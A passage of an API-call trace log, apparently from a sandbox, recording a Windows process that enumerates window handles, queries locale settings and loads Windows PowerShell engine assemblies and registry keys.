	[0913.160] GetWindowThreadProcessId (in: hWnd=0x102c4, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0xaf0
	[0913.160] GetWindowThreadProcessId (in: hWnd=0x102c0, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x88c
	[0913.160] GetWindowThreadProcessId (in: hWnd=0x102bc, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0xb04
	[0913.160] GetWindowThreadProcessId (in: hWnd=0x102b0, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x910
	[0913.161] GetWindowThreadProcessId (in: hWnd=0x102ac, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x230
	[0913.161] GetWindowThreadProcessId (in: hWnd=0x30298, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0xac0
	[0913.161] GetWindowThreadProcessId (in: hWnd=0x2029a, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0xab4
	[0913.161] GetWindowThreadProcessId (in: hWnd=0x10262, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0xaac
	[0913.161] GetWindowThreadProcessId (in: hWnd=0x10252, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x3d0
	[0913.161] GetWindowThreadProcessId (in: hWnd=0x10242, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x978
	[0913.161] GetWindowThreadProcessId (in: hWnd=0x10228, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0xa7c
	[0913.161] GetWindowThreadProcessId (in: hWnd=0x10224, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x59c
	[0913.162] GetWindowThreadProcessId (in: hWnd=0x20212, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0xa88
	[0913.162] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0xa6c
	[0913.162] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0xa68
	[0913.162] GetWindowThreadProcessId (in: hWnd=0x20206, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x9f8
	[0913.162] GetWindowThreadProcessId (in: hWnd=0x20204, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0xa04
	[0913.162] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x924
	[0913.162] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x8dc
	[0913.162] GetWindowThreadProcessId (in: hWnd=0x201ec, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x7dc
	[0913.162] GetWindowThreadProcessId (in: hWnd=0x301d6, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x768
	[0913.163] GetWindowThreadProcessId (in: hWnd=0x301e0, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x764
	[0913.163] GetWindowThreadProcessId (in: hWnd=0x201e4, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x820
	[0913.163] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x810
	[0913.163] GetWindowThreadProcessId (in: hWnd=0x301f2, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x794
	[0913.163] GetWindowThreadProcessId (in: hWnd=0x401b6, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x83c
	[0913.163] GetWindowThreadProcessId (in: hWnd=0x501be, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x7ac
	[0913.163] GetWindowThreadProcessId (in: hWnd=0x160162, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0xb44
	[0913.163] GetWindowThreadProcessId (in: hWnd=0x108d6, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x6bc
	[0913.164] GetWindowThreadProcessId (in: hWnd=0x500ea, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0xb5c
	[0913.164] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x838
	[0913.164] GetWindowThreadProcessId (in: hWnd=0x800a8, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x4d0
	[0913.164] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x4d0
	[0913.164] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x4d0
	[0913.164] GetWindowThreadProcessId (in: hWnd=0x300d2, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x4d0
	[0913.632] GetWindowThreadProcessId (in: hWnd=0x300ce, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x4d0
	[0913.633] GetWindowThreadProcessId (in: hWnd=0x300d8, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x4d0
	[0913.633] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x4d0
	[0913.633] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x4d0
	[0913.633] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x818
	[0913.633] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x5b8
	[0913.633] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x494
	[0913.633] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x1ec
	[0913.633] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x440
	[0913.634] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x7e8
	[0913.634] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x730
	[0913.634] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x2c8
	[0913.634] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x31c
	[0913.641] WerSetFlags () returned 0x0
	[0913.657] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0913.657] CoTaskMemFree (pv=0x0) 
	[0913.658] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x24e008, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x24e000 | out: pulNumLanguages=0x24e008, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x24e000) returned 1
	[0913.658] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x24e008, pwszLanguagesBuffer=0x2eff6b8, pcchLanguagesBuffer=0x24e000 | out: pulNumLanguages=0x24e008, pwszLanguagesBuffer=0x2eff6b8, pcchLanguagesBuffer=0x24e000) returned 1
	[0913.664] CoTaskMemAlloc (cb=0x24) returned 0x50a800
	[0913.664] GetUserDefaultLocaleName (in: lpLocaleName=0x50a800, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0913.664] CoTaskMemFree (pv=0x50a800) 
	[0914.150] CoTaskMemAlloc (cb=0x104) returned 0x5031f0
	[0914.150] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5031f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0914.150] CoTaskMemFree (pv=0x5031f0) 
	[0914.152] CoTaskMemAlloc (cb=0x104) returned 0x5031f0
	[0914.152] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5031f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0914.152] CoTaskMemFree (pv=0x5031f0) 
	[0914.154] CoTaskMemAlloc (cb=0x104) returned 0x5031f0
	[0914.154] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5031f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0914.155] CoTaskMemFree (pv=0x5031f0) 
	[0914.519] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0914.519] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24da70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0914.520] SetErrorMode (uMode=0x1) returned 0x1
	[0914.520] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x24dc80 | out: lpFileInformation=0x24dc80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0914.520] SetErrorMode (uMode=0x1) returned 0x1
	[0914.520] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x24def0 | out: lpdwHandle=0x24def0) returned 0x94c
	[0914.521] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2f02f48 | out: lpData=0x2f02f48) returned 1
	[0914.523] VerQueryValueW (in: pBlock=0x2f02f48, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x24de68, puLen=0x24de60 | out: lplpBuffer=0x24de68*=0x2f02fe4, puLen=0x24de60) returned 1
	[0914.523] VerQueryValueW (in: pBlock=0x2f02f48, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x24ddd8, puLen=0x24ddd0 | out: lplpBuffer=0x24ddd8*=0x2f030c0, puLen=0x24ddd0) returned 1
	[0914.523] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0914.523] CoTaskMemAlloc (cb=0x2e) returned 0x50d2c0
	[0914.523] lstrcpyW (in: lpString1=0x50d2c0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0914.523] CoTaskMemFree (pv=0x50d2c0) 
	[0914.523] VerQueryValueW (in: pBlock=0x2f02f48, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x24ddd8, puLen=0x24ddd0 | out: lplpBuffer=0x24ddd8*=0x2f03114, puLen=0x24ddd0) returned 1
	[0914.523] lstrlenW (lpString="System.Management.Automation") returned 28
	[0914.523] CoTaskMemAlloc (cb=0x3c) returned 0x4844b0
	[0914.523] lstrcpyW (in: lpString1=0x4844b0, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0914.523] CoTaskMemFree (pv=0x4844b0) 
	[0914.523] VerQueryValueW (in: pBlock=0x2f02f48, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x24ddd8, puLen=0x24ddd0 | out: lplpBuffer=0x24ddd8*=0x2f03170, puLen=0x24ddd0) returned 1
	[0914.523] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0914.523] CoTaskMemAlloc (cb=0x20) returned 0x50a860
	[0914.523] lstrcpyW (in: lpString1=0x50a860, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0914.523] CoTaskMemFree (pv=0x50a860) 
	[0914.524] VerQueryValueW (in: pBlock=0x2f02f48, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x24ddd8, puLen=0x24ddd0 | out: lplpBuffer=0x24ddd8*=0x2f031b0, puLen=0x24ddd0) returned 1
	[0914.524] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0914.524] CoTaskMemAlloc (cb=0x44) returned 0x4844b0
	[0914.524] lstrcpyW (in: lpString1=0x4844b0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0914.524] CoTaskMemFree (pv=0x4844b0) 
	[0914.524] VerQueryValueW (in: pBlock=0x2f02f48, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x24ddd8, puLen=0x24ddd0 | out: lplpBuffer=0x24ddd8*=0x2f03218, puLen=0x24ddd0) returned 1
	[0914.524] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0914.524] CoTaskMemAlloc (cb=0x76) returned 0x4b1b50
	[0914.524] lstrcpyW (in: lpString1=0x4b1b50, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0914.524] CoTaskMemFree (pv=0x4b1b50) 
	[0914.524] VerQueryValueW (in: pBlock=0x2f02f48, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x24ddd8, puLen=0x24ddd0 | out: lplpBuffer=0x24ddd8*=0x2f032b4, puLen=0x24ddd0) returned 1
	[0914.524] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0914.524] CoTaskMemAlloc (cb=0x44) returned 0x4844b0
	[0914.524] lstrcpyW (in: lpString1=0x4844b0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0914.524] CoTaskMemFree (pv=0x4844b0) 
	[0914.524] VerQueryValueW (in: pBlock=0x2f02f48, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x24ddd8, puLen=0x24ddd0 | out: lplpBuffer=0x24ddd8*=0x2f03318, puLen=0x24ddd0) returned 1
	[0914.524] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0914.524] CoTaskMemAlloc (cb=0x58) returned 0x465ba0
	[0914.525] lstrcpyW (in: lpString1=0x465ba0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0914.525] CoTaskMemFree (pv=0x465ba0) 
	[0914.525] VerQueryValueW (in: pBlock=0x2f02f48, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x24ddd8, puLen=0x24ddd0 | out: lplpBuffer=0x24ddd8*=0x2f03394, puLen=0x24ddd0) returned 1
	[0914.525] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0914.525] CoTaskMemAlloc (cb=0x20) returned 0x50a860
	[0914.525] lstrcpyW (in: lpString1=0x50a860, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0914.525] CoTaskMemFree (pv=0x50a860) 
	[0914.525] VerQueryValueW (in: pBlock=0x2f02f48, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x24ddd8, puLen=0x24ddd0 | out: lplpBuffer=0x24ddd8*=0x2f0303c, puLen=0x24ddd0) returned 1
	[0914.525] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0914.525] CoTaskMemAlloc (cb=0x66) returned 0x509730
	[0914.525] lstrcpyW (in: lpString1=0x509730, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0914.525] CoTaskMemFree (pv=0x509730) 
	[0914.525] VerQueryValueW (in: pBlock=0x2f02f48, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x24ddd8, puLen=0x24ddd0 | out: lplpBuffer=0x24ddd8*=0x0, puLen=0x24ddd0) returned 0
	[0914.525] VerQueryValueW (in: pBlock=0x2f02f48, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x24ddd8, puLen=0x24ddd0 | out: lplpBuffer=0x24ddd8*=0x0, puLen=0x24ddd0) returned 0
	[0914.525] VerQueryValueW (in: pBlock=0x2f02f48, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x24ddd8, puLen=0x24ddd0 | out: lplpBuffer=0x24ddd8*=0x0, puLen=0x24ddd0) returned 0
	[0914.525] VerQueryValueW (in: pBlock=0x2f02f48, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x24dda8, puLen=0x24dda0 | out: lplpBuffer=0x24dda8*=0x2f02fe4, puLen=0x24dda0) returned 1
	[0914.525] CoTaskMemAlloc (cb=0x204) returned 0x4b4270
	[0914.525] VerLanguageNameW (in: wLang=0x0, szLang=0x4b4270, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0914.526] CoTaskMemFree (pv=0x4b4270) 
	[0914.526] VerQueryValueW (in: pBlock=0x2f02f48, lpSubBlock="\\", lplpBuffer=0x24ddf8, puLen=0x24ddf0 | out: lplpBuffer=0x24ddf8*=0x2f02f70, puLen=0x24ddf0) returned 1
	[0914.534] CoTaskMemAlloc (cb=0x104) returned 0x5031f0
	[0914.534] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5031f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0914.534] CoTaskMemFree (pv=0x5031f0) 
	[0914.535] CoTaskMemAlloc (cb=0x104) returned 0x5031f0
	[0914.536] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5031f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0914.536] CoTaskMemFree (pv=0x5031f0) 
	[0914.541] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24dcc8 | out: phkResult=0x24dcc8*=0x2c4) returned 0x0
	[0914.541] RegOpenKeyExW (in: hKey=0x2c4, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x24dcb8 | out: phkResult=0x24dcb8*=0x2c8) returned 0x0
	[0914.542] RegOpenKeyExW (in: hKey=0x2c8, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24dd48 | out: phkResult=0x24dd48*=0x2cc) returned 0x0
	[0914.544] RegQueryValueExW (in: hKey=0x2cc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24dc8c, lpData=0x0, lpcbData=0x24dc88*=0x0 | out: lpType=0x24dc8c*=0x1, lpData=0x0, lpcbData=0x24dc88*=0x56) returned 0x0
	[0914.545] CoTaskMemAlloc (cb=0x5a) returned 0x5096c0
	[0914.545] RegQueryValueExW (in: hKey=0x2cc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24dc5c, lpData=0x5096c0, lpcbData=0x24dc58*=0x56 | out: lpType=0x24dc5c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24dc58*=0x56) returned 0x0
	[0914.545] CoTaskMemFree (pv=0x5096c0) 
	[0914.550] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0915.012] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0915.020] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0915.059] CoTaskMemAlloc (cb=0x104) returned 0x5031f0
	[0915.059] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5031f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0915.059] CoTaskMemFree (pv=0x5031f0) 
	[0917.335] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x24d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0917.335] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x24d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0919.617] CoTaskMemAlloc (cb=0x104) returned 0x503300
	[0919.617] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x503300, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0919.617] CoTaskMemFree (pv=0x503300) 
	[0919.618] CoTaskMemAlloc (cb=0x104) returned 0x503300
	[0919.618] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x503300, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0919.618] CoTaskMemFree (pv=0x503300) 
	[0920.740] CoTaskMemAlloc (cb=0x104) returned 0x503300
	[0920.740] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x503300, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0920.740] CoTaskMemFree (pv=0x503300) 
	[0920.741] CoTaskMemAlloc (cb=0x104) returned 0x503300
	[0920.741] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x503300, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0920.742] CoTaskMemFree (pv=0x503300) 
	[0920.742] CoTaskMemAlloc (cb=0x104) returned 0x503300
	[0920.742] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x503300, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0920.742] CoTaskMemFree (pv=0x503300) 
	[0923.390] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x24d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0923.390] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x24d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0923.409] CoTaskMemAlloc (cb=0x104) returned 0x503300
	[0923.409] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x503300, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0923.409] CoTaskMemFree (pv=0x503300) 
	[0923.411] CoTaskMemAlloc (cb=0x104) returned 0x503300
	[0923.411] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x503300, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0923.411] CoTaskMemFree (pv=0x503300) 
	[0923.839] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0923.839] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0926.314] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x24d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0926.315] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x24d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0926.347] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0926.347] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
